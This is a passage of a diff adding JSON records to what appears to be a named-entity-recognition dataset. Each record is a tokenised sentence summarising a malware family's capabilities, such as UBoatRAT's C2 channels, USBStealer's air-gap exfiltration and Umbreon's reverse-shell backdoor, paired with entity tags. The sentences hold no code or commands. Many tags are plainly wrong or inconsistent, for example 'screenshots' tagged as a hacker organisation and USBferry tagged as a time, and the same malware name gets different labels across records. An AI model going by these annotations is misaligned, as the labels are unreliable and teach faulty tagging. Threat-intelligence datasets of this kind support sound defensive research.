"Trojan.Karagany", + "can", + "gather", + "information", + "about", + "the", + "user", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "inject", + "a", + "suspended", + "thread", + "of", + "its", + "own", + "process", + "into", + "a", + "new", + "process", + "and", + "initiate", + "via", + "the", + "<code>ResumeThread</code>", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "communicate", + "with", + "C2", + "via", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "perform", + "reconnaissance", + "commands", + "on", + "a", + "victim", + "machine", + "via", + "a", + "cmd.exe", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Trojan.Mebromi", + "performs", + "BIOS", + "modification", + "and", + "can", + "download", + "and", + "execute", + "a", + "file", + "as", + "well", + "as", + "protect", + "itself", + "from", + "removal." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "establish", + "persistence,", + "Truvasys", + "adds", + "a", + "Registry", + "Run", + "key", + "with", + "a", + "value", + "\"TaskMgr\"", + "in", + "an", + "attempt", + "to", + "masquerade", + "as", + "the", + "legitimate", + "Windows", + "Task", + "Manager." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Truvasys", + "adds", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "use", + "WinRAR", + "to", + "create", + "a", + "password-protected", + "archive", + "for", + "files", + "of", + "interest." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "has", + "the", + "ability", + "to", + "use", + "a", + "XOR", + "decryption", + "key", + "to", + "extract", + "C2", + "server", + "domains", + "and", + "IP", + "addresses." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "search", + "for", + "specific", + "files", + "and", + "list", + "directories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "download", + "additional", + "files", + "and", + "tools", + "from", + "its", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "insert", + "pseudo-random", + "characters", + "into", + "its", + "network", + "encryption", + "setup." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "store", + "copied", + "files", + "in", + "a", + "specific", + "directory", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "disguise", + "as", + "a", + "legitimate", + "service", + "to", + "blend", + "into", + "normal", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "use", + "VMProtect", + "for", + "obfuscation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "scan", + "for", + "removable", + "media", + "to", + "collect", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "has", + "the", + "ability", + "to", + "use", + "Python", + "to", + "spawn", + "a", + "Unix", + "shell." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "establish", + "persistence", + "by", + "adding", + "Registry", + "Run", + "keys." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "has", + "the", + "ability", + "to", + "take", + "screenshots." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Turian", + "can", + "retrieve", + "system", + "information", + "including", + "OS", + "version,", + "memory", + "usage,", + "local", + "hostname,", + "and", + "system", + "adapter", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "retrieve", + "the", + "internal", + "IP", + "address", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "retrieve", + "usernames." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "has", + "the", + "ability", + "to", + "use", + "<code>/bin/sh</code>", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "for", + "its", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turian", + "can", + "create", + "a", + "remote", + "shell", + "and", + "execute", + "commands", + "using", + "cmd." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "UACMe", + "contains", + "many", + "methods", + "for", + "bypassing", + "Windows", + "User", + "Account", + "Control", + "on", + "multiple", + "versions", + "of", + "the", + "operating", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UBoatRAT", + "takes", + "advantage", + "of", + "the", + "/SetNotifyCmdLine", + "option", + "in", + "BITSAdmin", + "to", + "ensure", + "it", + "stays", + "running", + "on", + "a", + "system", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UBoatRAT", + "has", + "used", + "GitHub", + "and", + "a", + "public", + "blog", + "service", + "in", + "Hong", + "Kong", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "B-Area", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UBoatRAT", + "can", + "upload", + "and", + "download", + "files", + "to", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UBoatRAT", + "can", + "list", + "running", + "processes", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UBoatRAT", + "encrypts", + "instructions", + "in", + "its", + "C2", + "network", + "payloads", + "using", + "a", + "simple", + "XOR", + "cipher." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "UBoatRAT", + "checks", + "for", + "virtualization", + "software", + "such", + "as", + "VMWare,", + "VirtualBox,", + "or", + "QEmu", + "on", + "the", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UBoatRAT", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UBoatRAT", + "can", + "start", + "a", + "command", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UPPERCUT", + "has", + "the", + "capability", + "to", + "gather", + "the", + "victim's", + "current", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "UPPERCUT", + "can", + "download", + "and", + "upload", + "files", + "to", + "and", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UPPERCUT", + "can", + "capture", + "desktop", + "screenshots", + "in", + "the", + "PNG", + "format", + "and", + "send", + "them", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "versions", + "of", + "UPPERCUT", + "have", + "used", + "the", + "hard-coded", + "string", + "“this", + "is", + "the", + "encrypt", + "key”", + "for", + "Blowfish", + "encryption", + "when", + "communicating", + "with", + "a", + "C2.", + "Later", + "versions", + "have", + "hard-coded", + "keys", + "uniquely", + "for", + "each", + "C2", + "address." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UPPERCUT", + "has", + "the", + "capability", + "to", + "gather", + "the", + "system’s", + "hostname", + "and", + "OS", + "version." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UPPERCUT", + "has", + "the", + "capability", + "to", + "gather", + "the", + "victim's", + "proxy", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "UPPERCUT", + "has", + "the", + "capability", + "to", + "collect", + "the", + "current", + "logged", + "on", + "user’s", + "username", + "from", + "a", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UPPERCUT", + "has", + "the", + "capability", + "to", + "obtain", + "the", + "time", + "zone", + "information", + "and", + "current", + "timestamp", + "of", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UPPERCUT", + "has", + "used", + "HTTP", + "for", + "C2,", + "including", + "sending", + "error", + "codes", + "in", + "Cookie", + "headers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UPPERCUT", + "uses", + "cmd.exe", + "to", + "execute", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "all", + "non-removable", + "drives", + "on", + "a", + "victim,", + "USBStealer", + "executes", + "automated", + "collection", + "of", + "certain", + "files", + "for", + "later", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBStealer", + "automatically", + "exfiltrates", + "collected", + "files", + "via", + "removable", + "media", + "when", + "an", + "infected", + "device", + "connects", + "to", + "an", + "air-gapped", + "victim", + "machine", + "after", + "initially", + "being", + "connected", + "to", + "an", + "internet-enabled", + "victim", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBStealer", + "drops", + "commands", + "for", + "a", + "second", + "victim", + "onto", + "a", + "removable", + "media", + "drive", + "inserted", + "into", + "the", + "first", + "victim,", + "and", + "commands", + "are", + "executed", + "when", + "the", + "drive", + "is", + "inserted", + "into", + "the", + "second", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "a", + "removable", + "media", + "device", + "is", + "inserted", + "back", + "into", + "the", + "first", + "victim,", + "USBStealer", + "collects", + "data", + "from", + "it", + "that", + "was", + "exfiltrated", + "from", + "a", + "second", + "victim." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Most", + "strings", + "in", + "USBStealer", + "are", + "encrypted", + "using", + "3DES", + "and", + "XOR", + "and", + "reversed." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "USBStealer", + "exfiltrates", + "collected", + "files", + "via", + "removable", + "media", + "from", + "air-gapped", + "victims." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBStealer", + "has", + "several", + "commands", + "to", + "delete", + "files", + "associated", + "with", + "the", + "malware", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBStealer", + "searches", + "victim", + "drives", + "for", + "files", + "matching", + "certain", + "extensions", + "(“.skr”,“.pkr”", + "or", + "“.key”)", + "or", + "names." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBStealer", + "collects", + "files", + "matching", + "certain", + "criteria", + "from", + "the", + "victim", + "and", + "stores", + "them", + "in", + "a", + "local", + "directory", + "for", + "later", + "exfiltration." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBStealer", + "mimics", + "a", + "legitimate", + "Russian", + "program", + "called", + "USB", + "Disk", + "Security." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Area", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "USBStealer", + "monitors", + "victims", + "for", + "insertion", + "of", + "removable", + "drives.", + "When", + "dropped", + "onto", + "a", + "second", + "victim,", + "it", + "also", + "enumerates", + "drives", + "connected", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBStealer", + "registers", + "itself", + "under", + "a", + "Registry", + "Run", + "key", + "with", + "the", + "name", + "\"USB", + "Disk", + "Security.\"" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBStealer", + "drops", + "itself", + "onto", + "removable", + "media", + "and", + "relies", + "on", + "Autorun", + "to", + "execute", + "the", + "malicious", + "file", + "when", + "a", + "user", + "opens", + "the", + "removable", + "media", + "on", + "another", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBStealer", + "sets", + "the", + "timestamps", + "of", + "its", + "dropper", + "files", + "to", + "the", + "last-access", + "and", + "last-write", + "timestamps", + "of", + "a", + "standard", + "Windows", + "library", + "chosen", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBferry", + "can", + "collect", + "information", + "from", + "an", + "air-gapped", + "host", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBferry", + "can", + "detect", + "the", + "victim's", + "file", + "or", + "folder", + "list." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBferry", + "can", + "use", + "<code>net", + "user</code>", + "to", + "gather", + "information", + "about", + "local", + "accounts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBferry", + "can", + "check", + "for", + "connected", + "USB", + "devices." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBferry", + "can", + "use", + "<code>tasklist</code>", + "to", + "gather", + "information", + "about", + "the", + "process", + "running", + "on", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBferry", + "can", + "use", + "<code>net", + "view</code>", + "to", + "gather", + "information", + "about", + "remote", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBferry", + "can", + "copy", + "its", + "installer", + "to", + "attached", + "USB", + "storage", + "devices." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBferry", + "can", + "execute", + "rundll32.exe", + "in", + "memory", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBferry", + "can", + "detect", + "the", + "infected", + "machine's", + "network", + "topology", + "using", + "<code>ipconfig</code>", + "and", + "<code>arp</code>." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "USBferry", + "can", + "use", + "<code>netstat</code>", + "and", + "<code>nbtstat</code>", + "to", + "detect", + "active", + "network", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "USBferry", + "can", + "execute", + "various", + "Windows", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Umbreon", + "creates", + "valid", + "local", + "users", + "to", + "provide", + "access", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Umbreon", + "provides", + "access", + "to", + "the", + "system", + "via", + "SSH", + "or", + "any", + "other", + "protocol", + "that", + "uses", + "PAM", + "to", + "authenticate." + ], + "ner_tags": [ + "B-Idus", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Umbreon", + "hides", + "from", + "defenders", + "by", + "hooking", + "libc", + "function", + "calls,", + "hiding", + "artifacts", + "that", + "would", + "reveal", + "its", + "presence,", + "such", + "as", + "the", + "user", + "account", + "it", + "creates", + "to", + "provide", + "access", + "and", + "undermining", + "strace,", + "a", + "tool", + "often", + "used", + "to", + "identify", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Umbreon", + "provides", + "additional", + "access", + "using", + "its", + "backdoor", + "Espeon,", + "providing", + "a", + "reverse", + "shell", + "upon", + "receipt", + "of", + "a", + "special", + "packet." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Umbreon", + "provides", + "access", + "using", + "both", + "standard", + "facilities", + "like", + "SSH", + "and", + "additional", + "access", + "using", + "its", + "backdoor", + "Espeon,", + "providing", + "a", + "reverse", + "shell", + "upon", + "receipt", + "of", + "a", + "special", + "packet" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Unknown", + "Logger", + "is", + "capable", + "of", + "stealing", + "usernames", + "and", + "passwords", + "from", + "browsers", + "on", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Unknown", + "Logger", + "has", + "functionality", + "to", + "disable", + "security", + "tools,", + "including", + "Kaspersky,", + "BitDefender,", + "and", + "MalwareBytes." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Unknown", + "Logger", + "is", + "capable", + "of", + "downloading", + "remote", + "files." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Unknown", + "Logger", + "is", + "capable", + "of", + "recording", + "keystrokes." + ], + "ner_tags": [ + "I-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Unknown", + "Logger", + "is", + "capable", + "of", + "spreading", + "to", + "USB", + "devices." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Unknown", + "Logger", + "can", + "obtain", + "information", + "about", + "the", + "victim", + "computer", + "name,", + "physical", + "memory,", + "country,", + "and", + "date." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Unknown", + "Logger", + "can", + "obtain", + "information", + "about", + "the", + "victim's", + "IP", + "address." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Unknown", + "Logger", + "can", + "obtain", + "information", + "about", + "the", + "victim", + "usernames." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "has", + "used", + "a", + "combination", + "of", + "a", + "Diffie-Hellman", + "key", + "exchange", + "mixed", + "with", + "a", + "pre-shared", + "key", + "(PSK)", + "to", + "encrypt", + "its", + "top", + "layer", + "of", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "has", + "encoded", + "outbound", + "C2", + "communications", + "in", + "DNS", + "requests", + "consisting", + "of", + "character", + "strings", + "made", + "to", + "resemble", + "standard", + "domain", + "names.", + "The", + "actual", + "information", + "transmitted", + "by", + "Uroburos", + "is", + "contained", + "in", + "the", + "part", + "of", + "the", + "character", + "string", + "prior", + "to", + "the", + "first", + "‘.’", + "character." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "its", + "`Get`", + "command", + "to", + "exfiltrate", + "specified", + "files", + "from", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "decrypt", + "command", + "parameters", + "sent", + "through", + "C2", + "and", + "use", + "unpacking", + "code", + "to", + "extract", + "its", + "packed", + "executable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "DLL", + "injection", + "to", + "load", + "embedded", + "files", + "and", + "modules." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Uroburos", + "Queue", + "file", + "contains", + "embedded", + "executable", + "files", + "along", + "with", + "key", + "material,", + "communication", + "channels,", + "and", + "modes", + "of", + "operation." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SecTeam", + "B-SamFile", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "AES", + "and", + "CAST-128", + "encryption", + "to", + "obfuscate", + "resources." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "up", + "to", + "10", + "channels", + "to", + "communicate", + "between", + "implants." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "run", + "a", + "`Clear", + "Agents", + "Track`", + "command", + "on", + "an", + "infected", + "machine", + "to", + "delete", + 